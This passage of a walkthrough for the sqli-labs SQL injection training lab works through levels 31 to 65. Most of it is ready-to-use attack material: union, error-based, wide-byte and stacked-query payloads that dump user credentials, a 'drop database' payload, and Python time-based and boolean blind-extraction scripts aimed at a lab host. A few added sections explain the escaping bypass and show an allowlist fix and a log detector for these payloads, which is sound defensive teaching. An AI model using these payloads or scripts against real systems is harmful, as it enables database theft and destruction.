    ?id=1&id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=1&id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=1&id=-1") union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
    

less-32

  • Escaping with addslashes().

    ?id=-1%bb' union select 1,2,database() --+   view database
    ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
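
What the %bb byte does to addslashes() escaping in less-32 and the other wide-byte lessons, at byte level. This is an added example, not the lab's code: it emulates PHP's addslashes() in Python, assumes the database connection interprets the bytes as GBK, and assumes a hardened application that is UTF-8 end to end; the function names are hypothetical.

```python
from urllib.parse import unquote_to_bytes


def php_addslashes(raw: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): prefix ' " \\ and NUL with a backslash."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(0x30 if b == 0x00 else b)   # PHP writes NUL as \0
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count quotes that are NOT preceded by a backslash once the bytes are
    read as characters of `charset` (the way the database server reads them)."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":        # backslash escapes the next character
            i += 2
            continue
        if text[i] in "'\"":
            count += 1
        i += 1
    return count


def accepts_input(raw: bytes, charset: str = "utf-8") -> bool:
    """Hardening check: refuse byte sequences that are not valid text in the
    application's single agreed charset, before they reach any query."""
    try:
        raw.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


if __name__ == "__main__":
    raw = unquote_to_bytes("-1%bb'")          # value prefix used on the page
    escaped = php_addslashes(raw)             # b"-1\xbb\\'"
    print("escaped bytes:", escaped)
    # Read as GBK, 0xBB 0x5C is ONE two-byte character: the backslash that
    # addslashes() inserted is swallowed and the quote is left bare.
    print("bare quotes as gbk:  ", unescaped_quotes(escaped, "gbk"))
    # Read as UTF-8, the backslash stays a backslash and still escapes the quote.
    print("bare quotes as utf-8:", unescaped_quotes(escaped, "utf-8"))
    print("accepted as utf-8 input:", accepts_input(raw))
```

Bound query parameters avoid the problem entirely, because the value never passes through string escaping.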
    

less-33

  • Same as less-32.

    ?id=-1%bb' union select 1,2,database() --+   view database
    ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
    

less-34

  • Wide-byte injection as well; capture the request with Burp and modify it.

    uname=a%bb' union select 1,database()#&passwd=1&submit=Submit   view database
    uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit   view tables
    uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit   view columns
    uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit   view columns
    

less-35

  • Integer type.

    ?id=0 union select 1,2,database()--+   view database
    ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+   view columns
    ?id=0 union select 1,2,group_concat(username,0x3e,password) from users--+   view columns
    

less-36

  • Same as less-32.

    ?id=-1%bb' union select 1,2,database() --+   view database
    ?id=-1%bb' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=-1%bb' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=-1%bb' union select 1,2,group_concat(username,0x3e,password) from users --+   view columns
    

less-37

  • Wide-byte injection as well; capture the request with Burp and modify it.

    uname=a%bb' union select 1,database()#&passwd=1&submit=Submit   view database
    uname=a%bb' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit   view tables
    uname=a%bb' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273#&passwd=1&submit=Submit   view columns
    uname=a%bb' union select 1,group_concat(username,0x3e,password) from users#&passwd=1&submit=Submit   view columns
    

less-38

  • Stacked injection: multiple SQL statements can be executed. Union injection can be used to view the database contents, and separating statements with ; allows arbitrary SQL statements to run, even deleting the database: ;drop database security;--+

    ?id=0' union select 1,2,database()--+   view database
    ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0' union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-39

  • Same as less-38, integer type; arbitrary SQL statements can be executed.

    ?id=0 union select 1,2,database()--+   view database
    ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-40

  • Same as less-38, closed with a single quote plus parenthesis.

    ?id=0') union select 1,2,database()--+   view database
    ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0') union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-41

  • Same as less-38, integer type.

    ?id=0 union select 1,2,database()--+   view database
    ?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+   view tables
    ?id=0 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+   view columns
    ?id=0 union select 1,2,group_concat(username,0x3e,password) from users --+   view contents
    

less-42

  • The earlier second-order injection can be used. Stacked injection also works, in the password field of login.php; for example, to copy a table.

    login_user=1&login_password=1';create table a like users;--+
    

less-43

  • Same as less-42, closed with a single quote plus parenthesis.

    login_user=1&login_password=1');create table a like users;--+
    

less-44

  • Same as less-42.

    login_user=1&login_password=1';create table a like users;--+
    

less-45

  • Same as less-43.

    login_user=1&login_password=1');drop table a;--+
    

less-46

  • ORDER BY clause. Errors are echoed back; integer type.

    ?sort=0 and updatexml(1,concat(1,(select database())),1)--+
    ?sort=0 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+   view tables
    ?sort=0 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
    ?sort=0 and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+   view contents
    

less-47

  • Same as less-46, closed with a single quote.

    ?sort=0' and updatexml(1,concat(1,(select database())),1)--+
    ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+   view tables
    ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
    ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+   view contents
    

less-48

  • Time-based blind injection.

import requests

url = 'http://192.168.3.39:84/Less-48/?sort=0||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-49

  • Time-based blind injection.

import requests

url = 'http://192.168.3.39:84/Less-49/?sort=0\'||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-50

  • Time-based blind injection.

    import requests

    url = 'http://192.168.3.39:84/Less-50/?sort=0||'
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            try:
                # A reply within 1 s means sleep(2) did not run: the character is <= mid.
                requests.get(url + payload, timeout=1)
                tail = mid
            except requests.exceptions.Timeout:
                head = mid + 1

        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

less-51

  • Time-based blind, stacked-query and error-based injection all work here; it is much the same as the earlier levels.

    ?sort=0' and updatexml(1,concat(1,(select database())),1)--+
    ?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ view tables
    ?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
    ?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ view contents
    

less-52

  • Time-based blind injection or stacked-query injection.

    import requests

    url = 'http://192.168.3.39:84/Less-52/?sort=0||'
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            try:
                # A reply within 1 s means sleep(2) did not run: the character is <= mid.
                requests.get(url + payload, timeout=1)
                tail = mid
            except requests.exceptions.Timeout:
                head = mid + 1

        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

less-53

  • Time-based blind injection or stacked-query injection.

    import requests

    url = 'http://192.168.3.39:84/Less-53/?sort=0\'||'
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
            try:
                # A reply within 1 s means sleep(2) did not run: the character is <= mid.
                requests.get(url + payload, timeout=1)
                tail = mid
            except requests.exceptions.Timeout:
                head = mid + 1

        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)
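
The `sort` levels above (less-48 to less-53) depend on the request value reaching the `ORDER BY` clause unchecked. The added example below, which is not code from the original post, puts that pattern beside an allowlisted version; it assumes an in-memory SQLite table with constructed rows in place of the lab's MySQL database, and all function names are hypothetical.

```python
import sqlite3

# Constructed rows standing in for the lab's users table (assumption).
ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]

# The only identifiers and keywords allowed to reach the ORDER BY clause.
SORT_COLUMNS = {"id": "id", "username": "username"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    """Build the in-memory table used by both functions (hypothetical helper)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def list_users_vulnerable(conn, sort):
    # The request value is concatenated into ORDER BY, so the database
    # evaluates any expression the client sends, not just a column name.
    return conn.execute("SELECT id, username FROM users ORDER BY " + sort).fetchall()


def list_users_safe(conn, sort="id", direction="asc"):
    # Identifiers cannot be bound as ? parameters, so translate the request
    # value through a fixed mapping and reject everything else.
    column = SORT_COLUMNS.get(sort)
    order = SORT_DIRECTIONS.get(direction.lower())
    if column is None or order is None:
        raise ValueError("unsupported sort option")
    sql = f"SELECT id, username FROM users ORDER BY {column} {order}"
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(list_users_vulnerable(db, "-id"))  # expression evaluated by the database
    print(list_users_safe(db, "username", "desc"))
    try:
        list_users_safe(db, "0||if(ascii(substr(database(),1,1))>64,sleep(2),0)")
    except ValueError as exc:
        print("rejected:", exc)
```

With the mapping in place, the `sort` value only selects among fixed strings, so none of the payload shapes used in these levels reaches the SQL text.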

less-54

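  • Similar to the earlier levels, but the number of attempts is limited. First work out how the parameter is closed; quote closure is the most common. From this level on, the database, table, column names and contents may all differ, so retrieve them step by step.

    ?id=0' union select 1,2,database()--+    view database
    ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='GAC1FTFF3I'--+  view columns
    ?id=0' union select 1,2,group_concat(sessid,0x3e,secret_SBM0,0x3e,tryy) from GAC1FTFF3I--+  view contents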
    

less-55

  • Same as less-54.

    ?id=0) union select 1,2,database()--+    view database
    ?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    ?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+  view columns
    ?id=0) union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+  view contents
    

less-56

  • Same as less-54.

    ?id=0') union select 1,2,database()--+    view database
    ?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    ?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+  view columns
    ?id=0') union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+  view contents
    

less-57

  • Same as less-54.

    ?id=0" union select 1,2,database()--+    view database
    ?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   view tables
    ?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BJGSBTXAB5'--+  view columns
    ?id=0" union select 1,2,group_concat(sessid,0x3e,secret_5M6O,0x3e,tryy) from BJGSBTXAB5--+  view contents
    

less-58

  • Error-based injection, much like the above, but the attempt limit is 5, so probing for the closure can use them all up. You can therefore start directly from the table query and skip the database query, since it is not needed.

    ?id=0'||updatexml(1,concat(1,database()),2)--+    view database
    ?id=0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   view tables
    ?id=0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='MGJP2WHM3Y')),2)--+  view columns
    ?id=0'||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_24RK,0x3e,tryy) from MGJP2WHM3Y),1,32)),2)--+  view contents
    

less-59

  • Same as less-58.

    ?id=0||updatexml(1,concat(1,database()),2)--+    view database
    ?id=0||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   view tables
    ?id=0||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='LT7KPWCFHN')),2)--+  view columns
    ?id=0||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_ARJK,0x3e,tryy) from LT7KPWCFHN),1,32)),2)--+  view contents
    

less-60

  • Same as less-58.

    ?id=0")||updatexml(1,concat(1,database()),2)--+    view database
    ?id=0")||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   view tables
    ?id=0")||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+  view columns
    ?id=0")||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_YEKB,0x3e,tryy) from VFQELTLHRF),1,32)),2)--+  view contents
    

less-61

  • Same as less-58.

    ?id=0'))||updatexml(1,concat(1,database()),2)--+    view database
    ?id=0'))||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   view tables
    ?id=0'))||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+  view columns
    ?id=0'))||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_90EI,0x3e,tryy) from H3TPPX9L6M),1,32)),2)--+  view contents
    

less-62

  • Blind injection; use boolean-based whenever possible.

    import requests

    url = "http://192.168.3.39:84/Less-62/?id=0')||"
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="BVOP9BQ5Y1")),%d,1))>%d,1,0)--+'%(i,mid)
            payload = 'if(ascii(substr((select(group_concat(secret_1BQG))from(BVOP9BQ5Y1)),%d,1))>%d,1,0)--+'%(i,mid)
            r = requests.get(url + payload)
            # "Angelina" in the response is used as the marker for a true condition.
            if "Angelina" in r.text:
                head = mid + 1
            else:
                tail = mid
        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

less-63

  • Same as less-62. Because of the attempt limit, first click "Reset the Challenge!" in the top-right corner to reset the counter.

    import requests

    url = "http://192.168.3.39:84/Less-63/?id=0'||"
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="1TR0A8MPVK")),%d,1))>%d,1,0)--+'%(i,mid)
            payload = 'if(ascii(substr((select(group_concat(secret_A7M1))from(1TR0A8MPVK)),%d,1))>%d,1,0)--+'%(i,mid)
            r = requests.get(url + payload)
            # "Angelina" in the response is used as the marker for a true condition.
            if "Angelina" in r.text:
                head = mid + 1
            else:
                tail = mid
        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

less-64

  • Same as less-63.

    import requests

    url = "http://192.168.3.39:84/Less-64/?id=0))||"
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="R4BFEIU6PA")),%d,1))>%d,1,0)--+'%(i,mid)
            payload = 'if(ascii(substr((select(group_concat(secret_QVX3))from(R4BFEIU6PA)),%d,1))>%d,1,0)--+'%(i,mid)
            r = requests.get(url + payload)
            # "Angelina" in the response is used as the marker for a true condition.
            if "Angelina" in r.text:
                head = mid + 1
            else:
                tail = mid
        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)

less-65

  • Same as less-63.

    import requests

    url = "http://192.168.3.39:84/Less-65/?id=0\")||"
    result = ''
    i = 0

    while True:
        i = i + 1
        head = 32
        tail = 127

        # Binary search over the printable ASCII range for character i.
        while head < tail:
            mid = (head + tail) >> 1
            # Earlier stages: database name, table names, column names.
            #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
            #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="2WU00QD714")),%d,1))>%d,1,0)--+'%(i,mid)
            payload = 'if(ascii(substr((select(group_concat(secret_3IE7))from(2WU00QD714)),%d,1))>%d,1,0)--+'%(i,mid)
            r = requests.get(url + payload)
            # "Angelina" in the response is used as the marker for a true condition.
            if "Angelina" in r.text:
                head = mid + 1
            else:
                tail = mid
        # head == 32 means there is no character at position i, so stop.
        if head != 32:
            result += chr(head)
        else:
            break
        print(result)
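
The extraction scripts above leave a recognisable trail in web-server logs: many requests from one client that differ only in the position and threshold of an `ascii(substr(...))>N` comparison. The following added example (not from the original post) flags that pattern and the page's other payload markers in constructed access-log lines; the log format, client addresses and function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; the payload shapes follow the scripts above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-48/?sort=1 HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-48/?sort=0||if(ascii(substr(database(),1,1))%3E79,sleep(2),0)--+ HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Less-48/?sort=0||if(ascii(substr(database(),1,1))%3E103,sleep(2),0)--+ HTTP/1.1" 200 731
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /Less-48/?sort=0||if(ascii(substr(database(),1,1))%3E115,sleep(2),0)--+ HTTP/1.1" 200 731
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Less-51/?sort=0'+and+updatexml(1,concat(1,(select+database())),1)--+ HTTP/1.1" 200 731
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /search?q=sleep+apnea+union HTTP/1.1" 200 1204
"""

SIGNATURES = {
    "time_delay": re.compile(r"\bsleep\s*\("),
    "error_based": re.compile(r"\bupdatexml\s*\("),
    "schema_read": re.compile(r"\binformation_schema\b"),
    "union_select": re.compile(r"\bunion\s+select\b"),
}
# ascii(substr(<expr>,<position>,1))><threshold>: one guess of the binary search.
PROBE = re.compile(r"ascii\s*\(\s*substr\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)")
LINE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/')


def analyse(log_text, min_probes=3):
    hits = defaultdict(set)    # client -> signature names seen
    probes = defaultdict(set)  # client -> distinct (position, threshold) guesses
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, uri = m.group(1), unquote_plus(m.group(2)).lower()
        for name, rx in SIGNATURES.items():
            if rx.search(uri):
                hits[client].add(name)
        for pos, threshold in PROBE.findall(uri):
            probes[client].add((int(pos), int(threshold)))
    report = {}
    for client in set(hits) | set(probes):
        tags = set(hits[client])
        # Many distinct guesses mark the loop itself, with or without sleep().
        if len(probes[client]) >= min_probes:
            tags.add("blind_extraction")
        report[client] = sorted(tags)
    return report
```

Counting distinct guesses per client also covers the boolean variant in less-62 to less-65, which contains no `sleep()` call for a keyword rule to match.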

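3. Conclusion

  • There are only a handful of injection techniques. In a competition, the first task is to find the injection point and the second is to bypass the filtering.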